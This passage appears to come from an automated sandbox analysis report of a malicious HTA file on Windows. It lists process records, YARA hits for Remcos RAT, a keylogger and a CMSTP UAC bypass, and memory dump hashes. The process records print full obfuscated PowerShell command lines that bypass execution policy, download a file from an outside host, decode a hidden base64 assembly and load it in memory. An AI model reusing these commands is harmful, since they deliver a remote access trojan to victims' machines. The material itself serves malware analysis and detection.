17 8b cb 14 9a 2d
                                                                                                          Data Ascii: CaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ-
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea ca 0e b9 89
                                                                                                          Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93 76 d6 0a 40
                                                                                                          Data Ascii: TU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVIv@
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef c6 27 e2 ab
                                                                                                          Data Ascii: (4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08'
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0 a2 80 a0 fb
                                                                                                          Data Ascii: ]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


                                                                                                          Target ID:0
                                                                                                          Start time:11:18:02
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
                                                                                                          Imagebase:0x630000
                                                                                                          File size:13'312 bytes
                                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:11:18:10
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                                                                                                          Imagebase:0xdf0000
                                                                                                          File size:2'141'552 bytes
                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:11
                                                                                                          Start time:11:18:11
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                                                                                                          Imagebase:0xc60000
                                                                                                          File size:46'832 bytes
                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:11:18:17
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[...]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:12:53:16
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                          Imagebase:0x590000
                                                                                                          File size:108'664 bytes
                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.1254986832.0000000006D90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d90000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction ID: c1f49a7fb7eeace4dbbe2c461bd5034c9a38766e45fbba9cbfa35d8193b0bdd2
                                                                                                            • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1414342503.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4ec0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 759bc5b98503212e8f03dccc6bd111e54f0320a8950c73371b7a6464891b9650
                                                                                                            • Instruction ID: eb843aa3813e260393f8f4ac5ff26d736dc6e2e5bea247ed712b2ec4bca26f15
                                                                                                            • Opcode Fuzzy Hash: 759bc5b98503212e8f03dccc6bd111e54f0320a8950c73371b7a6464891b9650
                                                                                                            • Instruction Fuzzy Hash: 87223974A00219EFDB15CF98D984A9EBBB2FF88314F248159E815AB365D731ED42CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$84Oj$84Oj$84Oj$84Oj$tPq$tPq
                                                                                                            • API String ID: 0-2376529062
                                                                                                            • Opcode ID: 073f2030bae67461ad8a86d1f0f9bff397a29ca5daaea4c3217afc76c766833a
                                                                                                            • Instruction ID: c34a3609f38c8a300caabf8c52f465e847104597c4a32fa368fe670773f39f27
                                                                                                            • Opcode Fuzzy Hash: 073f2030bae67461ad8a86d1f0f9bff397a29ca5daaea4c3217afc76c766833a
                                                                                                            • Instruction Fuzzy Hash: 08F1B4B5B0021A9FDB24DB59D410B6AFBB2FFC5310F28846DE9459B381DA32EC42C791
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$84Oj$tPq
                                                                                                            • API String ID: 0-1083020389
                                                                                                            • Opcode ID: 119269b5ddda650350273ab8563047147c4a9f1e7b6baaed3405ca13a88fec10
                                                                                                            • Instruction ID: fd23151a5968d1a1d2b6c68cbc6fd1c7e1fd76c1116e785b20d05b01a9b1837f
                                                                                                            • Opcode Fuzzy Hash: 119269b5ddda650350273ab8563047147c4a9f1e7b6baaed3405ca13a88fec10
                                                                                                            • Instruction Fuzzy Hash: A691AFF4B0021ADFDB24CF48D551B69FBB2FB84210F28856DE9559B382CA32EC41CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$tPq$tPq
                                                                                                            • API String ID: 0-2376027684
                                                                                                            • Opcode ID: 08acbec4b5ef44f2307d83a13364900dee6e1f3359842cb58a315d12433b69fe
                                                                                                            • Instruction ID: 6211354713ea141d96b13a8b4553cfd22a01caf6ccc8cbfc96596ff5443cc74c
                                                                                                            • Opcode Fuzzy Hash: 08acbec4b5ef44f2307d83a13364900dee6e1f3359842cb58a315d12433b69fe
                                                                                                            • Instruction Fuzzy Hash: 5D5129B1B143169FD7249B689C10B6AFFA6EFC5710F14846EEA45DB381CA71DC02C7A1
                                                                                                            APIs
                                                                                                            • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04EC51A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1414342503.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4ec0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DownloadFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1407266417-0
                                                                                                            • Opcode ID: 7de957aa2a592f875aa5be7e854f23c0f2fed894f05c670e3f590cc6167c85ac
                                                                                                            • Instruction ID: fc02d15aa0f3e2920af53d5ee16519ab63ecb16cfab2e0bbad772ee46a625bad
                                                                                                            • Opcode Fuzzy Hash: 7de957aa2a592f875aa5be7e854f23c0f2fed894f05c670e3f590cc6167c85ac
                                                                                                            • Instruction Fuzzy Hash: 442126B1D0161AAFCB10CF99D984ADEFBB4FB48314F10812AE818A7210D374AA51CBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1413820011.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4dad000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41be6486b824e19a56c97c5afa6535b6b34bc5aef5ffc82b590d9f534668d8c2
                                                                                                            • Instruction ID: 72dd1547fa0a585fe0aceab0e8d4124332e0879ef35fe43de653a3779d51ece5
                                                                                                            • Opcode Fuzzy Hash: 41be6486b824e19a56c97c5afa6535b6b34bc5aef5ffc82b590d9f534668d8c2
                                                                                                            • Instruction Fuzzy Hash: B001F7316043409EE7204F21EC84B66BF9AEF41725F18C05ADD490B582C278A845CABA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1413820011.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4dad000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b5fb810332c448b8b09aa505930c8be37ae71c659674a015cd2b80f70f6a413
                                                                                                            • Instruction ID: c0d2152dbc0f39b338f16138059e1b0164190dc99510bbb0d09e72c197bedf61
                                                                                                            • Opcode Fuzzy Hash: 4b5fb810332c448b8b09aa505930c8be37ae71c659674a015cd2b80f70f6a413
                                                                                                            • Instruction Fuzzy Hash: 43015E6210E3C09FD7128B259898B56BFB5EF53224F1981DBD9888F1A3C2695849C772
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$X=5m$$q$$q
                                                                                                            • API String ID: 0-609386297
                                                                                                            • Opcode ID: c839a62ed76d6d4ce629b1f39fc071ef5918800f1e110af1b44ff1b79238e946
                                                                                                            • Instruction ID: 452a4c6b13580fd1aa860f75d87b1a04bf7630e3f40bea442231041fe260bc36
                                                                                                            • Opcode Fuzzy Hash: c839a62ed76d6d4ce629b1f39fc071ef5918800f1e110af1b44ff1b79238e946
                                                                                                            • Instruction Fuzzy Hash: A35105B1B0430BCFDB25CB69D8007AAFBF6AFC5214F18846ED885CB255DA31D842C792
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: e723309c52c960cd2e5ff39e4174b07f0e9a1848bd52fc6c2ce3e6e995d5e651
                                                                                                            • Instruction ID: c346e7b5ecf2d1941312e508578828ce222d6bee3209c652ff2b74609cdc7c7d
                                                                                                            • Opcode Fuzzy Hash: e723309c52c960cd2e5ff39e4174b07f0e9a1848bd52fc6c2ce3e6e995d5e651
                                                                                                            • Instruction Fuzzy Hash: 6A11D371714307DBEB34B62A9D01B66F796EFC5721F28C52EE84987280CA75C842C7D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
